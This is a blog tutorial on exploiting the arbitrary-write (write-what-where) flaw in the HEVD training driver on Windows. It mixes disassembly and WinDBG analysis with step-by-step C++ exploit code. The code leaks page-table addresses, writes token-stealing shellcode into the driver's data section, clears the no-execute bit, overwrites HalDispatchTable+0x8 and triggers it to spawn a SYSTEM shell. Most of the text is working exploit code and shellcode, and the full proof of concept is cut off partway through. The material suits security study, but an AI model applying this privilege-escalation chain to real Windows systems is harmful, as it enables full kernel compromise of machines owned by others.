- Published on
Kernel Exploitation Primer 0x5 - Arbitrary Write (Write-What-Where)
In this post, I am going to discuss another popular vulnerability called Arbitrary Write or Write-What-Where. It was really an interesting topic. I've tried to document every techniques here. Let’s get started without further ado.
Table of Contents
Write-What-Where Vulnerability Analysis
HEVD has specific function for Arbitrary Write vulnerability (also called as Write-What-Where) which is ArbitraryWriteIoctlHandler
, whose IOCTL code is 0x22200B
.
Basically, this vulnerability allows us to write arbitrary data (what) to an arbitrary memory location (where). So we have control over the data we need to write and also the location where we need to write, hence Write-What-Where vulnerability.
Let’s analyze ArbitraryWriteIoctlHandler
in IDA and we can see it makes a call to TriggerArbitraryWrite
function (1️⃣) and it also sends the user input (2️⃣) to the function call.
Diving into the function, it mentions the pointer to the user input (RCX) as UserWriteWhatWhere
(1️⃣) and later it stores the pointer to R14 register (2️⃣), now RCX and R14 holds the pointer to the user input.
Moving on, there is a call to ProbeForRead()
API (1️⃣) which is to check that a specified address actually resides in the user address space. This API takes 3 arguments where:
- The first argument is the user-space address and we know RCX still holds the user input address.
- The second argument is the length of the buffer which will be in RDX register, seeing the above instructions (2️⃣) there is
lea edx, [rsi+10h]
instruction and before that (3️⃣) RSI is XORed so it will be zero, by usinglea
instruction it will beEDX = 0 + 0x10
(this won’t work withmov
instruction) and EDX will be 0x10, so basically the length is 0x10 bytes. - Final argument is the
Aligment
which basically is the beginning of the user-mode buffer and it will take from the first byte (4️⃣).
void ProbeForRead(
[in] const volatile VOID *Address,
[in] SIZE_T Length,
[in] ULONG Alignment
);
Moving forward, after the ProbeForRead()
API call, there were few more operations, we already know R14 register holds the pointer of the user-input and by de-referencing it copies the first 8 bytes to RBX register (1️⃣) and the second 8 bytes register to RDI register (2️⃣). So probably it’s a structure with 2 x 8 bytes value. Finally it also stores the pointer (R14) of the user input to R9 register as well (3️⃣).
Here comes the interesting part, at the end of this block, there were 2 major operation happens:
- We know RBX holds the first 8 bytes (first member of the structure) of user input and it dereference that and copies that value to RAX register (1️⃣).
- And RDI holds the second 8 bytes (second member of the structure) of user input and it copies the value in RAX register to the RDI address. Basically overwriting what’s in RDI address.
RBX represents WHAT (the value to write), and RDI represents WHERE (the address to write to) in this arbitrary write scenario. This means that the value stored at the address specified by the second member of the user-provided structure (RDI) will be overwritten by the value stored in the first member of the user-provided structure (RBX).
Below is a quick POC which write whatever value stored in the pointer 0x4141414141414141
to 0x4242424242424242
. Of course this will fail because the address are not valid, but you get the idea.
// whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <Windows.h>
#include <stdio.h>
#include <psapi.h>
#define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)
typedef struct _WRITE_WHAT_WHERE {
void* WHAT;
void* WHERE;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;
int main()
{
printf("[+] Opening handle to driver\n");
HANDLE hDriver = CreateFileW(
L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
0,
nullptr);
if (hDriver == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to open handle: %d", GetLastError());
return 1;
}
WRITE_WHAT_WHERE input;
input.WHAT = (LPVOID)(0x4141414141414141);
input.WHERE = (LPVOID)(0x4242424242424242);
printf("[+] Calling TriggerArbitraryWrite....");
NTSTATUS success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
return 0;
}
Dynamic Analysis via WinDBG
Let’s discuss about WHAT we gonna write and WHERE we gonna write, well it’s obvious we want to write our shellcode but WHERE? We need to write somewhere in kernel-space, that need to be safe and also execute it without BSOD the machine, because it’s crucial when writing stuffs in the kernel such that we don’t overwrite any existing data that might be in use.
There is a popular way to exploit WRITE-WHAT-WHERE in Windows Kernel using HalDispatchTable. The Hardware Abstraction Layer (HAL) Dispatch Table is a table of function pointers. It serves as an interface for kernel-mode components (OS) to interact with different hardwares.
There is an undocumented Windows API function called NtQueryIntervalProfile(). Which internally calls KeQueryIntervalProfile()
.
Checking KeQueryIntervalProfile()
API, we can see a pointer stored in nt!HalDispatchTable+0x8
is moved to RAX (1️⃣) but instead of a direct call to nt!HalDispatchTable+0x8
itself, there is another call to nt!guard_dispatch_icall
(2️⃣) (more on this below)
As I said earlier, HalDispatchTable
is a table of pointer and the second pointer is what we gonna overwrite to our shellcode and call NtQueryIntervalProfile()
API to invoke it.
However, we noticed there is no direct call to nt!HalDispatchTable+0x8
itself, we have to go through nt!guard_dispatch_icall
which is a part of Kernel Control-Flow Guard (kCFG). So if we replace this pointer (nt!HalDispatchTable+0x8
) with our shellcode pointer, nt!guard_dispatch_icall
will block the shellcode call.
kCFG requires Virtualization-Based Security (VBS) and HVCI to be fully implemented, but HVCI is disabled in the current scenario. kCFG contains a bitmap that stores information about valid kernel function entry points. It is used by the kernel to verify whether an indirect function call or jump is legitimate before allowing execution.
Basically it determine if the value that is placed in the RAX (1️⃣ above image) is the same as what it was in the bitmap when it was created. Since HVCI is disabled, we should not worry about this, however kCFG also checks if the address is user-space or kernel-space, but it does not check this through PTE. So even if we flip the bit from “U” to “K” it does not matter, it will still block the call to our user-space shellcode.
Let’s summarize what we know till now, if we WRITE our shellcode address in nt!HalDispatchTable+0x8
, we can invoke NtQueryIntervalProfile()
API call to run our shellcode pointer which was placed in nt!HalDispatchTable+0x8
. But kCFG will block the kernel-space trying to execute user-space address. Well anyways, let’s give this a try and see it practically.
Usually we place ROP gadgets to bypass SMEP & VBS by finding the PTE of the user-space shellcode and flips the “U” flag to “K” and then execute the shellcode. And in previous Type Confusion & UAF vulnerabilities we used stack pivot inorder to execute the ROP gadgets to bypass SMEP & VBS. In this scenario we have WRITE permission, but we can also use this as READ.
Yes, we can WRITE WHATever values in any WHEREever we want, so what if we read (WHAT) the PTE base address and write that to a user-space (WHERE). So that we can flip the “U” flag to “K” and overwrite it in the next step.
Method (1) - VBS & SMEP Bypass (Failed)
A quick recap, the MiGetPteAddress()
call contains the PTE base address, which can be retrieved via MiGetPteAddress+0x13
, so this is what we are trying to read now.
Step 1: Read the PTE base address
- Allocated 8 bytes of user-space called as
PteBase
usingVirtualAlloc()
, this is where the PTE base address will be written. - Configured the
WRITE_WHAT_WHERE
structure,WHAT
is theMiGetPteAddress+0x13
address with the offset and NT base address (which is retrieved usingEnumDeviceDrivers()
). - Then we call
DeviceIoControl()
with the structure as input. - After the call, we read the value stored in
PteBase
which is the base address of PTE.
LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] MiGetPteAddress+0x13 Address: %p\n", PteBase);
WRITE_WHAT_WHERE input;
input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // MiGetPteAddress+0x13
input.WHERE = (LPVOID)(PteBase);
printf("[+] Calling TriggerArbitraryWrite....");
NTSTATUS success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
LPVOID* basePTE = (LPVOID*)PteBase;
printf("[+] Base of PTE: %p\n", *basePTE);
- Placed a breakpoint on the call to
TriggerArbitraryWrite
function and checking the RCX we can see the 2 values we sent.
Moving forward to the arbitrary write (1️⃣), first it copies the value stored in RBX (MiGetPteAddress+0x13
) to RAX register. Stepping over this instruction, we can confirm that RAX register holds the PTE base address (2️⃣). Then it writes the value stored in RAX to RDI pointer (3️⃣) and we can confirm that RDI (PteBase
) contains the PTE base address (4️⃣).
We can confirm this in the console as well, it printed the PTE base address. Now that Step 1 is over.
Step 2: PTE of Shellcode address
- Now that we got the PTE base address, we can allocate a region for our shellcode (
lpMemory
) - Do the calculation (
MiGetPte()
the same function as what we used in previous posts) to get the PTE address of our shellcode (actualPTE
). - Then using
TriggerArbitraryWrite
we can read that address to get the value stored, which is the PFN and the flags of our shellcode address (pfnShellcode
).
LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
printf("[+] Shellcode address: %p\n", lpMemory);
memcpy(lpMemory, shellcode, sizeof(shellcode));
uintptr_t ShellcodePte = MiGetPte(lpMemory);
printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte);
uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
printf("[+] Actual PTE of shellcode address: %p\n", actualPTE);
getchar();
LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);
input.WHAT = (LPVOID)(actualPTE);
input.WHERE = (LPVOID)(pfnShellcode);
printf("[+] Calling TriggerArbitraryWrite (2)....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
LPVOID* pfn = (LPVOID*)pfnShellcode;
printf("[+] PFN of shellcode: %p\n", *pfn);
Executed the POC and got the shellcode address and the PTE of the shellcode address.
Checked the Page table of the shellcode address and we can see the PTE address (0xFFFFA2816C3B3C80
) is same as what we retrieved through our POC and note down the value inside it.
Stepping over the getchar()
, retrieved the PTE bits of shellcode address and comparing that with the above image, both are same.
Step 3: Flipping “U/S” bit to “K” bit
- Now that we got the PTE bits/flags, we can flip the “U/S” bit to “K” bit, by subtracting or xor by 0x4 (
modifiedPFN
). - Then by calling
TriggerArbitraryWrite()
with the address of the shellcode PTE as WHERE and the modified value as WHAT, we can flip the flag.
uintptr_t modifiedPFN = (uintptr_t)*pfn - 0x4;
printf("[+] Modified PFN of shellcode with \"K\" flag: %p\n", modifiedPFN);
input.WHAT = (LPVOID)(&modifiedPFN);
input.WHERE = (LPVOID)(actualPTE);
printf("[+] Calling TriggerArbitraryWrite (3)....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
getchar();
Executed the POC and we got success message, let check that in WinDBG.
The value is modified and the flag is flipped to “K”.
Step 4: Overwriting HalDispatchTable+0x8
- Let’s overwrite
HalDispatchTable+0x8
pointer with out shellcode using the same method. - I retrieved the offset of
HalDispatchTable
(0x00c00a60
) and we already got the NT base address and by adding those we get the actual address, this is the location we gonna overwrite. - And the user-space shellcode (
lpMemory
) is what we gonna overwrite.
input.WHAT = (LPVOID)(&lpMemory);
input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // nt!HalDispathTable + 0x8
printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", lpMemory);
printf("[+] Calling TriggerArbitraryWrite (4)....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
Placed a breakpoint on the call to TriggerArbitraryWrite
, and checked the arguments to verify and we can see WHAT contains a pointer to our shellcode address and WHERE is the HalDispatchTable+0x8
address and the PTE address of the shellcode is already flipped to “K” flag.
Continuing the execution, we got success from the driver.
Checking the HalDispatchTable
table, we can confirm the second pointer is overwritten by our shellcode address.
Step 5: Execute NtQueryIntervalProfile()
- Now that everything is in place, the final step is to call
NtQueryIntervalProfile()
, since it’s a NT call, we need to retrieve the address, used the classic method ofGetProcAddress()
andGetModuleHandle()
to do that. - And finally invoked
NtQueryIntervalProfile()
call with appropriate arguments.
pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile) {
printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
return 1;
}
printf("[+] Found ntdll!NtQueryIntervalProfile\n");
printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");
getchar();
ULONG x = 0;
NtQueryIntervalProfile(
0x1337,
&x
);
Placed a breakpoint on the call to KeQueryIntervalProfile()
because internally NtQueryIntervalProfile()
calls that.
Got hit on the nt!KeQueryIntervalProfile()
call as expected (1️⃣) and started walking through the instructions. We can see the pointer in HalDispatchTable+0x8
is moved to RAX register (2️⃣). Checking the value in RAX register (3️⃣) we can confirm it is our user-space shellcode address. And moving on, it makes the call to nt!guard_dispatch_icall
with our shellcode address (4️⃣).
Stepping into the nt!guard_dispatch_icall
call, we can see there is a test
instruction on the user-space address and based on that it makes the jump. It decide this based on sign flag (SF).
- Typically user-space address is in the range of 0x0000000000000000 - 0x00007FFFFFFFFFFF, it always have the bit 63 as 0, so it set SF as 0.
- Kernel-space address is in the range of 0xFFFF800000000000 - 0xFFFFFFFFFFFFFFFF, it’s bit 63 is 1, so the SF is set to 1.
- Basically this
test
instruction checks if theSF
is 0 or 1 and decide whether it’s a user-space address or kernel-space address. Since this is user-space address, we can see theSF
is set to 0 and it took the jump.
Since it’s discovered it’s a user-space address, it ended up in BSOD. This is why at the beginning I mentioned even if we change the “U/S” bit to “K” bit, nt!guard_dispatch_icall
does not check that. So this concludes we need to find another way to execute our shellcode.
Method (2) - Driver’s Code Cave
The second method will be writing our shellcode in kernel-space that does not disturb other kernel components. The most common way is finding the .data
section of the driver itself and find if there is any space left at the end of the section, basically looking for code cave. From the driver’s header, we can see the virtual address of .data
.
0: kd> !dh hevd
File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
8664 machine (X64)
7 number of sections
5D1B4BB0 time date stamp Tue Jul 2 05:18:56 2019
0 file pointer to symbol table
0 number of symbols
F0 size of optional header
22 characteristics
Executable
App can handle >2gb addresses
[::]
SECTION HEADER #3
.data name
80018 virtual size
3000 virtual address
200 size of raw data
1400 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
C8000040 flags
Initialized Data
Not Paged
(no align specified)
Read Write
The .data
region is always Readable and Writeable but not Executable, also this region got enough space for the shellcode. It also has some data written at the beginning, so I just skipped some bytes (0x20), just to be sure we are not overwriting anything else. From the target address PTE we can see it does not have “E” flag, so we need to add that.
Step 1: Finding HEVD base address
- We are planning to write our shellcode in the
.data
section of the loaded HEVD driver, so we need to find the base address of it as well. - Modified the
getbaseaddress()
function which I was using till now, and it get’s the base address of all the drivers using EnumDeviceDrivers(). Using that address we can retrieve the driver name using GetDeviceDriverBaseNameW() and compare the driver name with the driver we are looking for, which is passed as an argument to this function call.
// whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <Windows.h>
#include <stdio.h>
PVOID getbaseaddress(LPCWSTR name)
{
BOOL status;
LPVOID* pImageBase;
DWORD ImageSize;
WCHAR driverName[1024];
LPVOID driverBase = nullptr;
status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
int driver_count = ImageSize / sizeof(pImageBase[0]);
for (int i = 0; i < driver_count; i++) {
GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(char));
if (!wcscmp(name, driverName)) {
driverBase = pImageBase[i];
break;
}
}
return driverBase;
}
int main()
{
LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
printf("[+] Nt base address: %p\n", nt_addr);
LPVOID hevd_addr = getbaseaddress(L"HEVD.sys");
printf("[+] HEVD base address: %p\n", hevd_addr);
return 0;
}
It worked perfectly, we can retrieve the base address of NT and also HEVD driver.
Step 2: Writing Shellcode to Kernel-space
- Now that we got HEVD base address, we can locate the region where we gonna write our shellcode which is
HEVD + 0x3000 + 0x20
. - Since we can write only 8 bytes at a time, I made a
for
loop which sends 8 bytes (of shellcode) at a time to the kernel-space address (HEVD + 0x3000 + 0x20) by callingTriggerArbitraryWrite
. - So
shellcode_start
is the kernel-space address where we gonna write the shellcode and also took a backup of that address askernelShellcode
.
// Step 2
LPVOID shellcode_start = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
LPVOID kernelShellcode = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);
BYTE shellcode[] = {
0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};
size_t size = sizeof(shellcode);
size_t num_chunks = size / 8;
uint64_t* chunks = new uint64_t[num_chunks];
for (size_t i = 0; i < num_chunks; i++) {
std::memcpy(&chunks[i], &shellcode[i * 8], 8);
input.WHAT = (LPVOID)(&chunks[i]);
input.WHERE = (LPVOID)(shellcode_start);
printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);
}
delete[] chunks;
Executed the POC, and we can see get the address of our shellcode in kernel, and it started writing our shellcode in that location.
Checking that address after the execution, we can see our shellcode is written here.
Step 3: PTE & PTE bits of the shellcode
- This step is as same as what we did in “Method (1)”, we gonna read
MiGetPteAddress+0x13
to get the base PTE address (basePTE
). We are doing this because the region where we have written our shellcode is justRW
and we needRWX
. - Then calculate the PTE address of our shellcode address using
MiGetPte()
(which is the same as what I used previously) and store the actual PTE address of the shellcode inactualPTE
. - Then using the
actualPTE
address, we read that and get the PTE bits, for the next operation (pfn
).
LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);
input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // MiGetPteAddress+0x13
input.WHERE = (LPVOID)(PteBase);
printf("[+] Calling TriggerArbitraryWrite....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
LPVOID* basePTE = (LPVOID*)PteBase;
printf("[+] Base address of PTE: %p\n", *basePTE);
uintptr_t ShellcodePte = MiGetPte(kernelShellcode);
uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
printf("[+] PTE of shellcode address: %p\n", actualPTE);
LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);
input.WHAT = (LPVOID)(actualPTE);
input.WHERE = (LPVOID)(pfnShellcode);
printf("[+] Calling TriggerArbitraryWrite....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
LPVOID* pfn = (LPVOID*)pfnShellcode;
printf("[+] PFN of shellcode address: %p\n", *pfn);
Executing the POC, we get the PTE address of the shellcode and also read the value. Cross-verified with WinDBG as well.
Step 4: Clear no-eXecute bit in PTE
- Now that we got the PTE bits/flags, we need to clear the no-eXecute bit from that, which can be done easily by doing an
AND
operation with0x0FFFFFFFFFFFFFFF
, we get the value with “E” flag (modifiedPFN
). - Then we call
TriggerArbitraryWrite
and write the modified value (modifiedPFN
) to the PTE address (actualPTE
) of the shellcode.
uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF;
printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", modifiedPFN);
input.WHAT = (LPVOID)(&modifiedPFN);
input.WHERE = (LPVOID)(actualPTE);
printf("[+] Calling TriggerArbitraryWrite....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
Now that the execution is success, and we can see “E” flag in our kernel-space shellcode address.
Step 5: Overwritting HalDispatchTable+0x8
- This step is also same as what we did in “Method (1)”, we gonna simply overwrite the pointer in
HalDispatchTable+0x8
with our kernel-space shellcode address (kernelShellcode
).
input.WHAT = (LPVOID)(&kernelShellcode);
input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8);
printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode);
printf("[+] Calling TriggerArbitraryWrite (4)....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
The execution to overwrite HalDispatchTable+0x8
is success. Checking the HalDispatchTable
, the second pointer is overwritten by our kernel shellcode address as well.
Step 6: Triggering NtQueryIntervalProfile()
- This is also the same step, we gonna execute
NtQueryIntervalProfile()
and trigger the call toHalDispatchTable+0x8
.
pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile) {
printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
return 1;
}
printf("[+] Found ntdll!NtQueryIntervalProfile\n");
printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");
ULONG x = 0;
NtQueryIntervalProfile(
0x1337,
&x
);
printf("[+] Spawning a shell with elevated privileges\n\n");
system("cmd");
Placed some breakpoints on the API calls and executed the code, and got hit on NtQueryIntervalProfile
, just continued that and got hit on the second breakpoint KeQueryIntervalProfile
. Let’s walkthrough this call once again.
The nt!HalDispatchTable+0x8
pointer is moved to RAX register (1️⃣) and we can also confirm that address is our kernel-space shellcode address (2️⃣). Moving on to the nt!guard_dispatch_icall
(3️⃣), let’s step into this call.
Now that we are stepped inside nt!guard_dispatch_icall
call (1️⃣), it made the call to test rax, rax
(2️⃣) to check the sign flag (SF) and after the call, we can confirm the SF
is “1”. So it didn’t take the jump.
Moving down the road, it makes an indirect jmp
to RAX register value, which is our shellcode address.
And it executed our shellcode, got shell as “SYSTEM”.
Full POC:
// whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there. // #include <Windows.h> #include <stdio.h> #include <psapi.h> #include <cstdint> #include <cstring> #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS) typedef struct _WRITE_WHAT_WHERE { void* WHAT; void* WHERE; } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE; typedef NTSTATUS(WINAPI* pNtQueryIntervalProfile)(IN ULONG ProfileSource, OUT PULONG Interval); PVOID getbaseaddress(LPCWSTR name) { BOOL status; LPVOID* pImageBase; DWORD ImageSize; WCHAR driverName[1024]; LPVOID driverBase = nullptr; status = EnumDeviceDrivers(nullptr, 0, &ImageSize); pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize); int driver_count = ImageSize / sizeof(pImageBase[0]); for (int i = 0; i < driver_count; i++) { GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(char)); if (!wcscmp(name, driverName)) { driverBase = pImageBase[i]; break; } } return driverBase; } uintptr_t MiGetPte(LPVOID lpMemory) { uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory); uintptr_t calc1 = addr >> 9; // shr rcx, 9 uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx return calc2; } int main() { WRITE_WHAT_WHERE input; NTSTATUS success; printf("[+] Opening handle to driver\n"); HANDLE hDriver = CreateFileW( L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr); if (hDriver == INVALID_HANDLE_VALUE) { printf("[!] Failed to open handle: %d", GetLastError()); return 1; } LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe"); printf("[+] Nt base address: %p\n", nt_addr); LPVOID hevd_addr = getbaseaddress(L"HEVD.sys"); printf("[+] HEVD base address: %p\n", hevd_addr); LPVOID shellcode_start = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20); LPVOID kernelShellcode = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20); printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start); // Step 2 BYTE shellcode[] = { 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88, 0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75, 0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80, 0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; size_t size = sizeof(shellcode); size_t num_chunks = size / 8; uint64_t* chunks = new uint64_t[num_chunks]; for (size_t i = 0; i < num_chunks; i++) { std::memcpy(&chunks[i], &shellcode[i * 8], 8); input.WHAT = (LPVOID)(&chunks[i]); input.WHERE = (LPVOID)(shellcode_start); printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8); } delete[] chunks; getchar(); LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE); printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase); input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); input.WHERE = (LPVOID)(PteBase); printf("[+] Calling TriggerArbitraryWrite...."); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } LPVOID* basePTE = (LPVOID*)PteBase; printf("[+] Base address of PTE: %p\n", *basePTE); uintptr_t ShellcodePte = MiGetPte(kernelShellcode); uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte; printf("[+] PTE of shellcode address: %p\n", actualPTE); getchar(); // Step 3 LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE); printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode); input.WHAT = (LPVOID)(actualPTE); input.WHERE = (LPVOID)(pfnShellcode); printf("[+] Calling TriggerArbitraryWrite...."); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } LPVOID* pfn = (LPVOID*)pfnShellcode; printf("[+] PFN of shellcode address: %p\n", *pfn); getchar(); // Step 4 uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF; printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", modifiedPFN); input.WHAT = (LPVOID)(&modifiedPFN); input.WHERE = (LPVOID)(actualPTE); printf("[+] Calling TriggerArbitraryWrite...."); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } getchar(); // Step 5 input.WHAT = (LPVOID)(&kernelShellcode); input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode); printf("[+] Calling TriggerArbitraryWrite...."); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { 